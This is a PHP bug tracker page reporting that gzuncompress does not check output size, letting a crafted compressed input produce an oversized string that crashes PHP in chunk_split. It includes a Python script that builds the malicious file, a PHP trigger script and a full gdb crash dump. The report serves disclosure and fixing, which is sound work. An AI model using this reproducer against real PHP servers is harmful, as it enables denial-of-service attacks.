|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-02 06:23 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-02 06:23 UTC] stas@php.net
[2016-09-02 16:07 UTC] nguyenluan dot vnn at gmail dot com
[2016-09-13 04:13 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:13 UTC] stas@php.net
[2016-09-13 12:35 UTC] nguyenluan dot vnn at gmail dot com
[2017-02-13 01:30 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Wed Apr 24 10:01:31 2024 UTC |
Description: ------------ gzuncompress function does NOT check for the output string size so attacker could create a string larger than 2GB, this is an overflow since PHP string couldn't be larger than this size. The output string could then be fed into other function to cause a crash. Test script: --------------- <?php ini_set('memory_limit', -1); $gzstr = file_get_contents("../1.gz"); var_dump(strlen($gzstr)); $str = gzuncompress($gzstr); var_dump(strlen($str)); chunk_split($str, 20, $str); ?> 1.gz is created from this python script (please run it with python 3) import zlib f = open('1.gz', 'wb') s = 'a'*0x8000ffff s = s.encode('utf-8') data = zlib.compress(s) f.write(data) f.close() Expected result: ---------------- No crash Actual result: -------------- Starting program: /home/user/Desktop/php-5.6.24/sapi/cli/php ../test.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". int(2087332) int(-2147418113) Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0xfffffffffffdffa9 RBX: 0x8afb0f (<execute_ex>: push rbp) RCX: 0xffffffff0001fffe RDX: 0xffffffff8000ffff RSI: 0x7fff3d94c070 ('a' <repeats 200 times>...) RDI: 0x7fffbd95c0c8 ('a' <repeats 16 times>) RBP: 0x7fffffffa5d0 --> 0x7fffffffa640 --> 0x7fffffffa680 --> 0x7fffffffa6b0 --> 0x7fffffffa6e0 --> 0x7fffffffa840 --> 0x7fffffffcab0 --> 0x7fffffffddf0 --> 0x7fffffffdf50 --> 0x0 RSP: 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>: mov eax,DWORD PTR [rbp-0x6c]) RIP: 0x7ffff675ceee (<__memcpy_sse2_unaligned+46>: ) R8 : 0x0 R9 : 0x0 R10: 0x7fffffffa260 --> 0x0 R11: 0x7ffff684b390 --> 0xfffda7a0fffda4cf R12: 0x4228a0 (<_start>: xor ebp,ebp) R13: 0x7fffffffe030 --> 0x2 R14: 0x0 R15: 0x0 EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff675cee0 <__memcpy_sse2_unaligned+32>: movdqu xmm8,XMMWORD PTR [rsi] 0x7ffff675cee5 <__memcpy_sse2_unaligned+37>: cmp rdx,0x20 0x7ffff675cee9 <__memcpy_sse2_unaligned+41>: movdqu XMMWORD PTR [rdi],xmm8 => 0x7ffff675ceee <__memcpy_sse2_unaligned+46>: movdqu xmm8,XMMWORD PTR [rsi+rdx*1-0x10] 0x7ffff675cef5 <__memcpy_sse2_unaligned+53>: movdqu XMMWORD PTR [rdi+rdx*1-0x10],xmm8 0x7ffff675cefc <__memcpy_sse2_unaligned+60>: ja 0x7ffff675cf10 <__memcpy_sse2_unaligned+80> 0x7ffff675cefe <__memcpy_sse2_unaligned+62>: mov rax,rdi 0x7ffff675cf01 <__memcpy_sse2_unaligned+65>: ret [------------------------------------stack-------------------------------------] 0000| 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>: mov eax,DWORD PTR [rbp-0x6c]) 0008| 0x7fffffffa530 --> 0x7fffffffa564 --> 0x1fffe8000ffff 0016| 0x7fffffffa538 --> 0x83105c (<_efree+111>: leave) 0024| 0x7fffffffa540 --> 0x0 0032| 0x7fffffffa548 --> 0x7ffff7f7e1e8 --> 0x7ffff1a96a70 ('Z' <repeats 16 times>, "\001") 0040| 0x7fffffffa550 --> 0x7ffff1a96a70 ('Z' <repeats 16 times>, "\001") 0048| 0x7fffffffa558 --> 0x300000000 0056| 0x7fffffffa560 --> 0x8000ffff00000000 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36 36 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. gdb-peda$ bt #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36 #1 0x00000000007715fc in zif_chunk_split (ht=0x3, return_value=0x7ffff1a96a70, return_value_ptr=0x7ffff7f7e1e8, this_ptr=0x0, return_value_used=0x0) at /home/user/Desktop/php-5.6.24/ext/standard/string.c:2221 #2 0x00000000008b0500 in zend_do_fcall_common_helper_SPEC ( execute_data=0x7ffff7f7e320) at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:558 #3 0x00000000008b5de6 in ZEND_DO_FCALL_SPEC_CONST_HANDLER ( execute_data=0x7ffff7f7e320) at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:2602 #4 0x00000000008afb6f in execute_ex (execute_data=0x7ffff7f7e320) at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:363 #5 0x00000000008afbf8 in zend_execute (op_array=0x7ffff7fb7e78) at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:388 #6 0x000000000086af69 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3) at /home/user/Desktop/php-5.6.24/Zend/zend.c:1341 #7 0x00000000007d0ab0 in php_execute_script (primary_file=0x7fffffffcbf0) at /home/user/Desktop/php-5.6.24/main/main.c:2613 #8 0x000000000091f33e in do_cli (argc=0x2, argv=0x106c3d0) at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:994 #9 0x000000000092066c in main (argc=0x2, argv=0x106c3d0) at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:1378 #10 0x00007ffff66e6f45 in __libc_start_main (main=0x91fe54 <main>, argc=0x2, argv=0x7fffffffe038, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe028) at libc-start.c:287 #11 0x00000000004228c9 in _start ()